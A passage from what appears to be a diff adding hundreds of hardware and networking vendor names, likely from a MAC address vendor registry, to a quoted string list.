Industrie-Elektronik GmbH", + "PNY Technologies, INC.", + "Consort Controls Ltd", + "S2m", + "Radmax Communication Private Limited", + "ATAW Co., Ltd.", + "Mophie, LLC", + "Coflec", + "vArmour Networks, Inc.", + "Asia Pacific CIS (Wuxi) Co, Ltd", + "LVX Western", + "ShenZhen LingKeWeiEr Technology Co., Ltd.", + "Cambridge Executive Limited", + "Velocytech Aps", + "Spire Payments", + "OSRAM GmbH", + "Lintes Technology Co., Ltd.", + "Elim Co", + "Ingenieurbuero Bickele und Buehler GmbH", + "Egatel Sl", + "I-Storm", + "Tarana Wireless", + "NPP ELIKS America Inc. DBA T&M Atlantic", + "Maitrise Technologique", + "Lisantech Co., Ltd.", + "MELPER Co., Ltd.", + "Kuhn Sa", + "Espotel Oy", + "Changzhou Haojie Electric Co., Ltd.", + "WATERWORLD Technology Co.,LTD", + "Libratone A/S", + "Newtek Electronics co., Ltd.", + "Ekon GmbH - myGEKKO", + "MikroBits", + "PSG Plastic Service GmbH", + "Manufacturing System Insights, Inc.", + "3ality Digital Systems GmbH", + "Magenta Research Ltd.", + "ValenceTech Limited", + "Advanced Rf Technologies Inc", + "Edwards Lifesciences LLC", + "New Spin Golf, LLC.", + "Omega Elektronik AS", + "Sva Technologies Co.ltd", + "Shenzhen Huaxuchang Telecom Technology Co.,Ltd", + "Prox Dynamics AS", + "Solberg & Andersen AS", + "hyungseul publishing networks", + "CalDigit, Inc", + "Shenzhen Egreat Tech Corp.,Ltd", + "ShenZhen Zhengjili Electronics Co., LTD", + "ePBoard Design LLC", + "Sitcorp", + "Kidasen Industria E Comercio De Antenas Ltda", + "Ekinops Sas", + "endeavour GmbH", + "DLOGIC GmbH", + "AXIM Communications", + "Unowhy", + "WOORI SYSTEMS Co., Ltd", + "Palladium Energy Eletronica Da Amazonia Ltda", + "WeTelecom Co., Ltd.", + "Inovonics", + "VSS Monitoring", + "AXAN Networks", + "Sound Masking Inc.", + "Viking Electronics Inc.", + "I.c.y. B.v.", + "Disruptive Ltd", + "Valink Co., Ltd.", + "Keen High Holding(HK) Ltd.", + "B-Link Electronic Limited", + "Evi Heat Ab", + "Shinybow Technology Co. Ltd.", + "Axtion Sdn Bhd", + "Honey Bee (Hong Kong) Limited", + "Milton Security Group LLC", + "SAKURA Internet Inc.", + "Microsoft XCG", + "Hefcom Metering (Pty) Ltd", + "Veros Systems, Inc.", + "Compupal (Group) Corporation", + "Eagle Kingdom Technologies Limited", + "bluesky", + "Chyng Hong Electronic Co., Ltd.", + "Firemax Indústria E Comércio De Produtos Eletrônicos Ltda", + "JSC Zavod im. Kozitsky", + "Guangdong Guanglian Electronic Technology Co.Ltd", + "Clare Controls Inc.", + "SEnergy Corporation", + "National Oilwell Varco Instrumentation, Monitoring, and Optimization (NOV IMO)", + "Eifelwerk Butler Systeme GmbH", + "Xi'an HISU Multimedia Technology Co.,Ltd.", + "Cedac Software S.r.l.", + "Tucson Embedded Systems", + "Rcf S.p.a.", + "Estun Automation Technoloy Co., Ltd", + "SBM Co., Ltd.", + "Kinetic Avionics Limited", + "DEOTRON Co., LTD.", + "CeraMicro Technology Corporation", + "DB Communication & Systems Co., ltd.", + "Comsis", + "Wizitdongdo", + "Mikrosay Yazilim ve Elektronik A.S.", + "Huiyang Technology Co., Ltd", + "Enhanced Vision", + "Aerodev", + "SEMA Electronics(HK) CO.,LTD", + "InterCreative Co., Ltd", + "Brusa Elektronik AG", + "Galleon Systems", + "Concept Development, Inc.", + "Sun Cupid Technology (HK) LTD", + "Simo Wireless,Inc.", + "Triteka LTD", + "Alcomp, Inc", + "Hame Technology Co., Limited", + "QEES ApS.", + "Cogent Healthcare Systems Ltd", + "DAT System Co.,Ltd", + "ISE Europe SPRL", + "Andtek", + "Napco Security Technologies", + "Redflow Limited", + "Hitachi Metals America Ltd", + "Far-sighted mobile", + "Centron Communications Technologies Fujian Co.,Ltd", + "Alpha and Omega, Inc", + "Hawa Technologies Inc", + "PrimeVOLT Co., Ltd.", + "EMW Co., Ltd.", + "FonSee Technology Inc.", + "EasySYNC Ltd.", + "Dasan Co., Ltd.", + "MYK, Inc.", + "Pivotal Systems Corporation", + "Solarbridge Technologies", + "M Seven System Ltd.", + "Simple Audio Ltd", + "Sciovid Inc.", + "Puissance Plus", + "Good Mind Industries Co., Ltd.", + "Trust Power Ltd.", + "Intercom, Inc.", + "Shenzhen C&D Electronics Co.,Ltd", + "Tri-Systems Corporation", + "Netgenetech.co.,ltd.", + "Siama Systems Inc", + "MicroMade Galka i Drozdz sp.j.", + "Beijing National Railway Research & Design Institute of Signal & Communication Co., Ltd.", + "Zaklad Elektroniczny Sims", + "Hiltron s.r.l.", + "Jabil Inc", + "Siemens Convergence Creators GmbH&Co.KG", + "L-tek d.o.o.", + "Xenox Holding BV", + "BriView (Xiamen) Corp.", + "Midokura Co., Ltd.", + "SmartDoor Systems, LLC", + "Benu Networks, Inc.", + "Beijing Superbee Wireless Technology Co.,Ltd", + "Sitecom Europe BV", + "InfoBLOCK S.A. de C.V.", + "Mitsuba Corporation", + "AEP Ticketing solutions srl", + "Shenzhen ireadygo Information Technology CO.,LTD.", + "Storagedata", + "Athena", + "eyevis GmbH", + "SYSCABLE Korea Inc.", + "ANNAX Anzeigesysteme GmbH", + "Anvia TV Oy", + "Wasion Group Ltd.", + "Vivonic GmbH", + "Plds", + "Eddyfi NDT Inc", + "Taiwan Jantek Electronics,Ltd.", + "Akyllor", + "EraThink Technologies Corp.", + "Jinmuyu Electronics Co., Ltd.", + "Noregon Systems, Inc", + "Q Electronics Ltd", + "Korea Infocom Co.,Ltd.", + "Lge", + "Piciorgros GmbH", + "Shenzhen Bitland Information Technology Co., Ltd.", + "Telefield Ltd", + "Affirmed Networks", + "Creation Technologies LP", + "Ottec Technology GmbH", + "Wuhan NEC Fibre Optic Communications industry Co. Ltd", + "XTrillion, Inc.", + "Olive Telecommunication Pvt. Ltd", + "University of FUKUI", + "Estech Co.,Ltd", + "Semindia Systems Pvt Ltd", + "VOGTEC(H.K.) Co., Ltd", + "Bhuu Limited", + "RackWare Inc.", + "PBR electronics GmbH", + "E-Prime Co., Ltd.", + "Humannix Co.,Ltd.", + "Ergophone GmbH", + "Sistema Solucoes Eletronicas Ltda - Easytech", + "Xtreme Technologies Corp", + "Globalsat International Technology Ltd", + "FACTS Engineering", + "global moisture management system", + "AWare, Inc", + "Sage Electronic Engineering LLC", + "GCI Science & Technology Co.,LTD", + "LightwaveRF Technology Ltd", + "Tianjin Techua Technology Co., Ltd.", + "Shenzhen Jiuzhou Electric Co.,LTD", + "Kentkart Ege Elektronik San. Ve Tic. Ltd. Sti.", + "The Coca Cola Company", + "ADFweb.com s.r.l.", + "Gewiss S.p.a.", + "Waldo Networks, Inc.", + "Verizon Business", + "Alpha Security Products", + "Inspur (Shandong) Electronic Information Co., Ltd", + "IDentytech Solutins Ltd.", + "Advanced Digital Broadcast SA", + "Aiconn Technology Corporation", + "Criticare Systems, Inc", + "SFORZATO Corp.", + "Virtual Instruments", + "Ningbo Global Useful Electric Co.,Ltd", + "JSC Irbis-T", + "Packet Force Technology Limited Company", + "Digivoice Tecnologia em Eletronica Ltda", + "Omniprint Inc.", + "Shanghai Howell Electronic Co.,Ltd", + "Fida International (S) Pte Ltd", + "Synerchip Co., Ltd.", + "Fujikura Rubber Ltd.", + "Delta Elektronika BV", + "Katoudenkikougyousyo co ltd", + "SysTec GmbH", + "Shenzhen Jetnet Technology Co.,Ltd.", + "Carma Industries Inc.", + "Exar Corp.", + "Jefferson Audio Video Systems, Inc.", + "Imaqliq Ltd", + "DIMEP Sistemas", + "C&C Technic Taiwan Co., Ltd.", + "Wifly-City System Inc.", + "Lee-Dickens Ltd", + "Arrayent", + "Longicorn, inc.", + "Beijing Risbo Network Technology Co.,Ltd", + "GreenWave Reality Inc", + "Jinan Jovision Science & Technology Co., Ltd.", + "NEC CASIO Mobile Communications", + "U-Raku, Inc.", + "Actifio Inc", + "Zhuhai Jiahe Communication Technology Co., limited", + "Bentek Systems Ltd.", + "ACES Technology", + "Tes Electronic Solutions", + "wenglor sensoric gmbh", + "Nimble Storage", + "Digital Check", + "Tangtop Technology Co.,Ltd", + "3view Ltd", + "enLighted Inc", + "Chipsip Technology Co., Ltd.", + "Amimon Ltd", + "Beijing CCD Digital Technology Co., Ltd", + "Global ES", + "SVS-VISTEK GmbH", + "Consert, Inc.", + "Evantage Industries Corp", + "NEXGEN Mediatech Inc.", + "Accutome", + "Mobile Integration Workgroup", + "Sky-City Communication and Electronics Limited Company", + "Shinyei Technology Co., Ltd.", + "KEEBOX, Inc.", + "Entrypass Corporation Sdn. Bhd.", + "Nata-Info Ltd.", + "Globalscale Technologies, Inc.", + "Fohhn Audio AG", + "Shenzhen Wision Technology Holding Limited", + "Innolight Technology Corporation", + "Secret Labs LLC", + "Sungjin C&T Co.,Ltd", + "Crystalfontz America, Inc.", + "Iota, Inc.", + "HENGBAO Corporation LTD.", + "Westinghouse Electric Company, LLC", + "AccuSpec Electronics, LLC", + "D.SignT GmbH & Co. KG", + "SAMWONFA Co.,Ltd.", + "Icomera", + "Ainsworth Game Technology", + "Assembled Products Corporation", + "CashGuard Sverige AB", + "Octopus Systems Limited", + "Laerdal Medical", + "DEOS control systems GmbH", + "UNITEC Co., Ltd.", + "Creative Electronics & Software, Inc.", + "Kael Mühendi̇sli̇k Elektroni̇k Ti̇caret Sanayi̇ Li̇mi̇ted Şi̇rketi̇", + "NST Co., LTD", + "True Technologies Inc.", + "Cat System Co.,Ltd.", + "Blackmagic Design", + "Beyond Devices d.o.o.", + "Sichuan Jinwangtong Electronic Science&Technology Co,.Ltd", + "Alta Data Technologies", + "Cameronet GmbH & Co. KG", + "SeAH Networks", + "Oy Finnish Electric Vehicle Technologies Ltd", + "Scalar Corporation", + "Caterpillar Trimble Control Technologies", + "Wellcore Corporation", + "Teracom Limited", + "TITENG CO., Ltd.", + "Portable Innovation Technology Ltd.", + "Indieon Technologies Pvt. Ltd.", + "Tsb Real Time Location Systems S.l.", + "Genix Infocomm Co., Ltd.", + "Fujian Newland Communication Science Technologies Co.,Ltd.", + "C2 Microsystems, Inc.", + "Shenzhen Junlan Electronic Ltd", + "Source Technologies, LLC", + "HMI Sources Ltd.", + "S.M. Dezac S.A.", + "Open Stack, Inc.", + "Casco Signal Ltd", + "Upos System sp. z o.o.", + "TMCT Co., LTD.", + "CK Telecom Ltd", + "Omneality Ltd.", + "People Power Company", + "Daewoois", + "Essec", + "Sgb Group Ltd.", + "Siemens Industry, Inc.", + "aizo ag", + "Compass-EOS", + "Reallin Electronic Co.,Ltd", + "Advanced Network Devices (dba:AND)", + "H. ZANDER GmbH & Co. KG", + "Shenzhen Ginwave Technologies Ltd.", + "TeleComp R&D Corp.", + "BenRui Technology Co.,Ltd", + "DSPECIALISTS GmbH", + "Decatur Electronics", + "Egker Kft.", + "EBN Technology Corp.", + "LeapFrog Enterprises, Inc.", + "Visualedge Technology Co., Ltd.", + "Eintechno Corporation", + "Thyssenkrupp Aufzugswerke GmbH", + "I.S.E. S.r.l.", + "Getinge Sterilization AB", + "Panamax LLC", + "Calibre UK LTD", + "Tigo Energy", + "Human Assembler, Inc.", + "Shenzhen Kootion Technology Co., Ltd", + "Nethra Imaging Incorporated", + "Overkiz", + "Application Solutions (Electronics and Vision) Ltd", + "Aava Mobile Oy", + "Precia", + "3Nod Multimedia(Shenzhen)Co.,Ltd", + "CloudSwitch", + "Sun Fountainhead USA. Corp", + "IGI Mobile, Inc.", + "Time Domain", + "Juni Korea Co., Ltd", + "JABLOCOM s.r.o.", + "Retail Innovation HTT AB", + "Zhejiang FeiYue Digital Technology Co., Ltd", + "PassivSystems Ltd", + "Visiontec da Amazônia Ltda.", + "NMR Corporation", + "Inter Sales A/S", + "Advanced Micro Peripherals", + "IEP GmbH", + "Micro World", + "Finsécur", + "Shenzhen Furtunetel Communication Co., Ltd", + "Crexendo Business Solutions, Inc.", + "Kong Yue Electronics & Information Industry (Xinhui) Ltd.", + "Radspin", + "Bettini Srl", + "Shanghai WOASiS Telecommunications Ltd., Co.", + "CE Digital(Zhenjiang)Co.,Ltd", + "Adachi-Syokai Co., Ltd.", + "Stanford University, OpenFlow Group", + "Optical Systems Design", + "Legrand Home Systems, Inc", + "SP Corp", + "Advanced Spectrum Technology Co., Ltd.", + "Shenzhen Siglent Technology Co., Ltd.", + "Oregan Networks Ltd.", + "A-Max Technology Macao Commercial Offshore Company Limited", + "Metz-Werke GmbH & Co KG", + "Hunter Douglas", + "MobileAccess Networks", + "Irumtek Co., Ltd.", + "Sansonic Electronics USA", + "T-Platforms (Cyprus) Limited", + "Coordiwise Technology Corp.", + "Nissho-denki Co.,LTD.", + "Shenzhen Huitaiwei Tech. Ltd, co.", + "Insightek Corp.", + "Artray Co., Ltd.", + "Schoonderbeek Elektronica Systemen B.V.", + "Interspiro AB", + "Ajoho Enterprise Co., Ltd.", + "StarLeaf Ltd.", + "Guangzhou Escene Computer Technology Limited", + "Megger", + "SOKRAT Ltd.", + "ICOMM Tele Ltd", + "IRCA SpA", + "Shanghai DigiVision Technology Co., Ltd.", + "Shenyang Tongfang Multimedia Technology Company Limited", + "LIOS Technology GmbH", + "RAUMFELD GmbH", + "Enabling Technology Pty Ltd", + "SMART Temps LLC", + "CC Systems AB", + "General Dynamics Mission Systems", + "RingBell Co.,Ltd.", + "Onbnetech", + "Infineta Systems, Inc", + "Hamamatsu Toa Electronics", + "Tunstall Healthcare A/S", + "KoCo Connector AG", + "I-TEC Co., Ltd.", + "Femtocomm System Technology Corp.", + "Hanshinit Inc.", + "TechnoDigital Technologies GmbH", + "Zhong Shan City Litai Electronic Industrial Co. Ltd", + "Hedon e.d. B.V.", + "Kalki Communication Technologies", + "ATENIX E.E. s.r.l.", + "Van Breda B.V.", + "Vizimax Inc.", + "SenTec AG", + "din Dietmar Nocker Facilitymanagement GmbH", + "DRS Consolidated Controls", + "Minimax GmbH & Co KG", + "Guangzhou Shirui Electronic Co., Ltd", + "Eurodesign BG LTD", + "Pole/Zero Corporation", + "J & F Labs", + "CallTechSolution Co.,Ltd", + "D-BOX Technologies", + "Nemo-Q International AB", + "MBDA Deutschland GmbH", + "itron", + "Asumo Co.,Ltd.", + "Carrier Culoz SA", + "Nti Comodo Inc", + "CENTRAL Corporation", + "HuRob Co.,Ltd", + "GridPoint, Inc.", + "iris-GmbH infrared & intelligent sensors", + "YT Elec. Co,.Ltd.", + "United Information Technology Co.,Ltd.", + "In Motion Technology Inc.", + "Plaster Networks", + "Comelit Group S.p.a", + "Chengdu GeeYa Technology Co.,LTD", + "Daido Signal Co., Ltd.", + "Genuine Technologies Co., Ltd.", + "GLOBAL Technology Inc.", + "Alcohol Monitoring Systems", + "Centrak, Inc.", + "Logitek Electronic Systems, Inc.", + "Zynus Vision Inc.", + "Rotel Technologies", + "Viaas Inc", + "Cxp Digital Bv", + "Winward Industrial Limited", + "Valiant Communications Limited", + "Advanced Video Communications Inc.", + "A7 Engineering, Inc.", + "Siklu Communication", + "Beijing Zhongchuang Telecommunication Test Co., Ltd.", + "ADC-Elektronik GmbH", + "Vine Telecom CO.,Ltd.", + "MuLogic BV", + "Nanjing Panda Electronics Company Limited", + "Raidon Technology, Inc.", + "ABB Automation products GmbH", + "Centre For Development Of Telematics", + "Do-Monix", + "Optec Displays, Inc.", + "Unitron nv", + "Idemia", + "Adolf Thies Gmbh & Co. KG", + "Ludl Electronic Products", + "RadChips, Inc.", + "Digital Barriers Advanced Technologies", + "Lectrosonics, Inc.", + "Micron", + "Virtual Computer Inc.", + "Op-Tection GmbH", + "Securitas Direct AB", + "Ultra Stereo Labs, Inc", + "Nextwave Semiconductor", + "Benign Technologies Co, Ltd.", + "OnePath Networks LTD.", + "saxnet gmbh", + "Team-R", + "Algorithmix GmbH", + "Nohmi Bosai Ltd.", + "Mk Master Inc.", + "Techno Design Co., Ltd.", + "ThinkFlood, Inc.", + "GGH Engineering s.r.l.", + "DAQ System", + "HFR, Inc.", + "SageTV, LLC", + "Jiangsu Lemote Technology Corporation Limited", + "Dizipia, Inc.", + "SandForce", + "Maxian", + "Proteus Industries Inc.", + "Ajinextek", + "Accretech SBS, Inc.", + "SGM Technology for lighting spa", + "Titan Wireless LLC", + "Sagrad, Inc.", + "Zylin AS", + "PIMA Electronic Systems Ltd.", + "Fourier Systems Ltd.", + "Deltacom Electronics Ltd", + "Polar Electro Oy", + "Zeeport Technology Inc.", + "Kisan Electronics Co", + "Hirsch Electronics Corporation", + "ARBURG GmbH & Co KG", + "OPPO Digital, Inc.", + "Cypak AB", + "Xtramus Technologies", + "Social Aid Research Co., Ltd.", + "Universal Telecom S/A", + "Alacron Inc.", + "Itoh Denki Co,Ltd.", + "Avaak, Inc.", + "Freegene Technology LTD", + "Good Will Instrument Co., Ltd.", + "Nomus Comm Systems", + "Daintree Networks Pty", + "Techway", + "Corventis Inc.", + "Design Design Technology Ltd", + "Nucomm, Inc.", + "SEEnergy Corp.", + "Leine & Linde AB", + "Home Multienergy Sl", + "MoCA (Multimedia over Coax Alliance)", + "OnLive, Inc", + "Garde Security AB", + "Morega Systems", + "Imacs GmbH", + "Si2 Microsystems Limited", + "Telit Communication s.p.a", + "HPN Supply Chain", + "INRange Systems, Inc", + "Western Engravers Supply, Inc.", + "Infrared Integrated Systems Ltd", + "EKE-Electronics Ltd.", + "I-Win", + "Display Solution AG", + "visago Systems & Controls GmbH & Co. KG", + "Northstar Systems Corp", + "Mekics Co., Ltd.", + "Avantgarde Acoustic Lautsprechersysteme GmbH", + "Glensound Electronics Ltd", + "Koratek", + "Cyfrowy Polsat SA", + "Wavecom Asia Pacific Limited", + "GL Communications Inc", + "Fiberblaze A/S", + "X2E GmbH", + "Pixel Velocity, Inc", + "Sanmina-SCI", + "Advanced Control Systems doo", + "Function ATI (Huizhou) Telecommunications Co., Ltd.", + "Shinsung Deltatech Co.,Ltd.", + "Optos Plc", + "Tellord", + "Aplicaciones Electronicas Quasar (AEQ)", + "GHI Electronics, LLC", + "Siemens AG, Sector Industry, Drive Technologies, Motion Control Systems", + "Keico Hightech Inc.", + "Building B, Inc", + "Brandywine Communications", + "Soltech Co., Ltd.", + "Presstek Inc.", + "Winchester Systems Inc.", + "dresden-elektronik", + "Cernium Corp", + "SenseAnywhere", + "GS Yuasa Power Supply Ltd.", + "DBS Lodging Technologies, LLC", + "Daiichi-Dentsu Ltd.", + "Optex Co.,Ltd.", + "Coretree, Co, Ltd", + "Kongsberg Defence & Aerospace", + "VIA Technologies, Inc.", + "T&W Electronics(Shenzhen)Co.,Ltd.", + "Datron World Communications, Inc.", + "Paradox Hellas S.A.", + "Alphion Corporation", + "Mobile Safe Track Ltd", + "Atlanta DTH, Inc.", + "MSI Technology GmbH", + "Accm", + "Travelping", + "Digitview Technology Co., Ltd.", + "Inner Mongolia Yin An Science & Technology Development Co.,L", + "Source Photonics, Inc.", + "Atlas Material Testing Technology LLC", + "HD Communications Corp", + "GEMAC Chemnitz GmbH", + "Roseman Engineering Ltd", + "Swissdis AG", + "Mojix Inc.", + "RP-Technik e.K.", + "Granch Ltd.", + "Gigafin Networks", + "Micro Motion Inc", + "Genesis I&C", + "Starbridge Networks", + "Radiocomp", + "Orange Logic", + "Bioscrypt Inc", + "Botik Technologies LTD", + "Sensor Switch, Inc.", + "GreenLine Communications", + "HAMILTON Bonaduz AG", + "Supercom Technology Corporation", + "ROBOTOUS, Inc.", + "XLN-t", + "LAN/MAN Standards Association (LMSC)", + "Taiwick Limited", + "Owitek Technology Ltd.,", + "Siemon", + "RB GeneralEkonomik", + "Holosys d.o.o.", + "Digital Lighting Systems, Inc", + "Master Industrialization Center Kista", + "T&W Electronics (ShenZhen) Co.,Ltd", + "Mitsubishi Precision Co.,LTd.", + "Opaque Systems", + "Dot Technology Int'l Co., Ltd.", + "Philips Electronics Uk Ltd", + "Nikko Denki Tsushin Corporation(NDTC)", + "Mikroelektronika spol. s r. o.", + "Intuicom", + "Zhejiang Broadcast&Television Technology Co.,Ltd.", + "Best Source Taiwan Inc.", + "Gtri", + "Ipte", + "SBN TECH Co.,Ltd.", + "ARVOO Imaging Products BV", + "Exéns Development Oy", + "PAV Electronics Limited", + "Xortec Oy", + "Santec", + "Maxi View Holdings Limited", + "Briot International", + "Palm, Inc", + "Sunshine Co,LTD", + "Vidient Systems, Inc.", + "Marusys", + "Intoto Inc.", + "DiMoto Pty Ltd", + "Seamless Internet", + "Takahata Electronics Co.,Ltd", + "Castles Technology, Co., LTD", + "WB Electronics", + "WatchGuard Video", + "ZANTAZ, Inc", + "Defzone B.V.", + "Carestream Health, Inc.", + "PureWave Networks", + "La Crosse Technology LTD", + "Microwave Radio Communications", + "Adam Communications Systems Int Ltd", + "Coming Media Corp.", + "Spinetix Sa", + "Electronics Corporation Of India Limited", + "FuJian HengTong Information Technology Co.,Ltd", + "Knorr-Bremse IT-Services GmbH", + "Shenzhen Sang Fei Consumer Communications Co.,Ltd", + "HM Electronics, Inc.", + "Neptune Digital", + "Parade Technologies, Ltd.", + "AudioScience", + "Maverick Systems Inc.", + "Wavetrend Technologies (Pty) Limited", + "Limetek", + "Shanghai Gaozhi Science & Technology Development Co.", + "Wuhan Telecommunication Devices Co.,Ltd", + "International Quartz Limited", + "Meyer Sound Laboratories, Inc.", + "Wiseblue Technology Limited", + "Kaise Electronic Technology Co., Ltd.", + "INDUSTRONIC Industrie-Electronic GmbH & Co. KG", + "ProStor Systems", + "Nac-Intercom", + "Aclara Power-Line Systems Inc.", + "Power Innovation GmbH", + "Optimedical Systems", + "Interactive Multimedia eXchange Inc.", + "Sangean Electronics Inc.", + "Digital Sky Corporation", + "Dualtech IT AB", + "LI-COR Biosciences", + "Dial Technology Ltd.", + "WiDeFi, Inc.", + "Qtum", + "Parallels, Inc.", + "ECKey Corporation", + "S Netsystems Inc.", + "ExaDigm Inc", + "Eunicorn", + "New Business Division/Rhea-Information CO., LTD.", + "New Level Telecom Co., Ltd.", + "Sunell Electronics Co.", + "Aeris Elettronica s.r.l.", + "Chenzhou Gospell Digital Technology Co.,Ltd", + "Pumpkin Networks, Inc.", + "CSP Frontier Technologies,Inc.", + "Celeno Communications", + "Shenzhen AEE Technology Co.,Ltd.", + "G-Technology, Inc.", + "The Wandsworth Group Ltd", + "Mayer & Cie GmbH & Co KG", + "Weiss Engineering Ltd.", + "Callpod, Inc.", + "Sutron", + "Pfister GmbH", + "Devon It", + "CONWISE Technology Corporation Ltd.", + "Digitrax Inc.", + "Nanjing SilverNet Software Co., Ltd.", + "Blossoms Digital Technology Co.,Ltd.", + "DMP Electronics INC.", + "Postek Electronics Co., Ltd.", + "Blueway Electronic Co;Ltd", + "Intellect International NV", + "Bharat Electronics Limited", + "iControl Incorporated", + "Lorica Solutions", + "MyungMin Systems, Inc.", + "TMN Technologies Telecomunicacoes Ltda", + "Beckmann GmbH", + "IDS Imaging Development Systems GmbH", + "Novus Security Sp. z o.o.", + "Video Systems Srl", + "Measurement Devices Ltd", + "Fsn Display Inc", + "Mobisolution Co.,Ltd", + "Deepsound Tech. Co., Ltd", + "Betty TV Technology AG", + "Health Hero Network, Inc.", + "Vencer Co., Ltd.", + "Sofacreal", + "Embedded Artists AB", + "Copley Controls Corporation", + "Pentaone. Co., Ltd.", + "Sicep s.p.a.", + "MiraLink Corporation", + "Midtronics, Inc.", + "Teletrak Ltd", + "Focus System Inc.", + "SIMS Corp.", + "Sinkyo Electron Inc", + "e-trees Japan, Inc.", + "Apprion", + "Intelligent Distributed Controls Ltd", + "Alien Technology", + "BPL Limited", + "Digital Acoustics, LLC", + "SANION Co., Ltd.", + "Areca Technology Corporation", + "Med-Eng Systems Inc.", + "Phoenix International Co., Ltd", + "Azuretec Co., Ltd.", + "Mvox Technologies Inc.", + "Medicis Technologies Corporation", + "INCOTEC GmbH", + "Shenztech Ltd", + "Interactivetv Pty Limited", + "Edge Access Inc", + "Joybien Technologies Co., Ltd.", + "YEC Co.,Ltd.", + "Asia Pacific Satellite Industries Co., Ltd.", + "Cyber Solutions Inc.", + "Ethos Networks LTD.", + "BRN Phoenix", + "fitivision technology Inc.", + "Trópico Sistemas e Telecomunicações da Amazônia LTDA.", + "Votronic GmbH", + "New Wave Design & Verification", + "Eletronica Nitron Ltda", + "Yupiteru Corporation", + "Celestial Semiconductor, Ltd", + "Unipoint", + "RightHand Technologies, Inc.", + "ICON Digital International Limited", + "Asotel Communication Limited Taiwan Branch", + "LN Srithai Comm Ltd.", + "Ayecom Technology Co., Ltd.", + "ASWT Co., LTD. Taiwan Branch H.K.", + "SATEC Co.,LTD", + "Ubistar", + "Ziova Coporation", + "Activa Multimedia", + "BARTEC GmbH", + "Korea Electric Power Data Network (KDN) Co., Ltd", + "KitWorks.fi Ltd.", + "Mosart Semiconductor Corp.", + "Weltec Enterprise Co., Ltd.", + "Takacom Corporation", + "Brookhuis Applied Technologies BV", + "Bona Technology Inc.", + "OpVista, Inc.", + "Mobinnova Corp.", + "Changshu Switchgear MFG. Co.,Ltd. (Former Changshu Switchgea", + "Diversified Technical Systems, Inc.", + "Cable Vision Electronics CO., LTD.", + "Star Communication Network Technology Co.,Ltd", + "Sagamore Systems, Inc.", + "asteel electronique atlantique", + "Bobst Sa", + "Ordyn Technologies", + "RadarFind Corporation", + "Infocrypt Inc.", + "Electro Chance Srl", + "IP Innovations, Inc.", + "RCG (HK) Ltd", + "AnyDATA Corporation", + "Vivox Inc", + "TeraMage Technologies Co., Ltd.", + "Maxfor", + "Matrix Inc.", + "Finnzymes", + "ELM DATA Co., Ltd.", + "Nokia Bell N.V.", + "2M2B Montadora de Maquinas Bahia Brasil LTDA", + "Antiope Associates", + "Advansus Corp.", + "Just In Mobile Information Technologies (Shanghai) Co., Ltd.", + "Posiflex Inc.", + "Metacom (Pty) Ltd.", + "YuHua TelTech (ShangHai) Co., Ltd.", + "Spectral Instruments, Inc.", + "Aclara RF Systems Inc.", + "Beyondwiz Co., Ltd.", + "Microlink communications Inc.", + "KUME electric Co.,Ltd.", + "BitsGen Co., Ltd.", + "Interactive Wear AG", + "Southern Vision Systems, Inc.", + "Bigfoot Networks Inc", + "Zeugma Systems", + "Beijing Huisen networks technology Inc", + "Picotest Corp.", + "Belden", + "Rackable Systems", + "HighPoint Technologies Incorporated", + "Intelliverese - DBA Voicecom", + "Cambridge Consultants Ltd", + "RF COncepts, LLC", + "AireSpider Networks", + "Innotech Corporation", + "Valemount Networks Corporation", + "Chunichi Denshi Co.,LTD.", + "Beijing Tianyu Communication Equipment Co., Ltd", + "Welding Technology Corporation", + "Accutech Ultrasystems Co., Ltd.", + "NPCore, Inc.", + "Kingstate Electronics Corporation", + "ads-tec GmbH", + "Zhongshan General K-mate Electronics Co., Ltd", + "WinNet Solutions Limited", + "Adeunis Rf", + "TEC WizHome Co., Ltd.", + "Shanghai Jiao Da HISYS Technology Co. Ltd.", + "Beijing Lhwt Microelectronics Inc.", + "ADigit Technologies Corp.", + "Anaveo", + "Dreamtech Co., Ltd", + "Persistent Systems, LLC", + "Sambu Communics CO., LTD.", + "Amplex A/S", + "Datalogic ADC", + "Shenzhen Dvbworld Technology Co., Ltd.", + "Global Link Digital Technology Co,.LTD", + "Mackware GmbH", + "Tecobest Technology Limited", + "Dawevision Ltd", + "Ascend Networks, Inc.", + "REJ Co.,Ltd", + "WooJooIT Ltd.", + "Clipsal Australia", + "AAI Corporation", + "Daemyung Zero1", + "Forcom Sp. z o.o.", + "Zeron Alliance", + "CEM Solutions Pvt Ltd", + "Asia Electronics Co.,Ltd", + "Palmmicro Communications", + "TaiJin Metal Co., Ltd.", + "Siemens Healthcare Diagnostics Manufacturing Ltd", + "Beijing InHand Networking Technology Co.,Ltd.", + "Argard Co., Ltd", + "AceNet Technology Inc.", + "Terabytes Server Storage Tech Corp", + "Tibetsystem", + "Coherent Research Limited", + "Sirit Inc", + "Mobile Computing Promotion Consortium", + "Apricorn", + "3soft inc.", + "ThruVision Ltd", + "iCatch Inc.", + "Remote Security Systems, LLC", + "O'Neil Product Development Inc.", + "AceNet Corporation", + "Philips Lighting BV", + "Accense Technology, Inc.", + "ATMedia GmbH", + "Zed-3", + "ACS Solutions Switzerland Ltd.", + "Falcom Wireless Comunications Gmbh", + "Telsy Elettronica S.p.A.", + "Independent Witness, Inc", + "Etymotic Research, Inc.", + "APD Communications Ltd", + "Ubicod Co.LTD", + "Thermo Ramsey Italia s.r.l.", + "Proware Technology Corp.(By Unifosa)", + "Liquid Computing", + "Extreme Engineering Solutions", + "iiTron Inc.", + "Industrie Dial Face S.p.A.", + "Socomec", + "Parama-tech Co.,Ltd.", + "Aviqtech Technology Co., Ltd.", + "Lumissil Microsystems", + "Tiba Medical Inc", + "BR Controls Nederland bv", + "Innovation Lab Corp.", + "Exalt Communications", + "MOSDAN Internation Co.,Ltd", + "Tohken Co.,Ltd.", + "2Ei", + "VK Corporation", + "Kbs", + "DSL Partner AS", + "WEBIO International Co.,.Ltd.", + "Donjin Co.,Ltd.", + "Chubb CSC-Vendor AP", + "ATech elektronika d.o.o.", + "BA Systems Inc", + "Bluebird Soft Inc.", + "iRex Technologies BV", + "Bury GmbH & Co. KG", + "Eleksen Ltd", + "Toho Technology Corp.", + "Archos", + "Sennheiser Communications A/S", + "HIVION Co., Ltd.", + "Woojinnet", + "SUNWAVETEC Co., Ltd.", + "Picosecond Pulse Labs", + "Optica Technologies Inc.", + "Sunhillo Corporation", + "LITE-ON Technology Corp.", + "Xensource, Inc.", + "Mathtech, Inc.", + "Xanboo", + "PLANET INT Co., Ltd", + "SetOne GmbH", + "Complete Media Systems", + "Science And Engineering Services, Inc.", + "Micronet Corporation", + "Yorkville Sound Inc.", + "Fairmount Automation", + 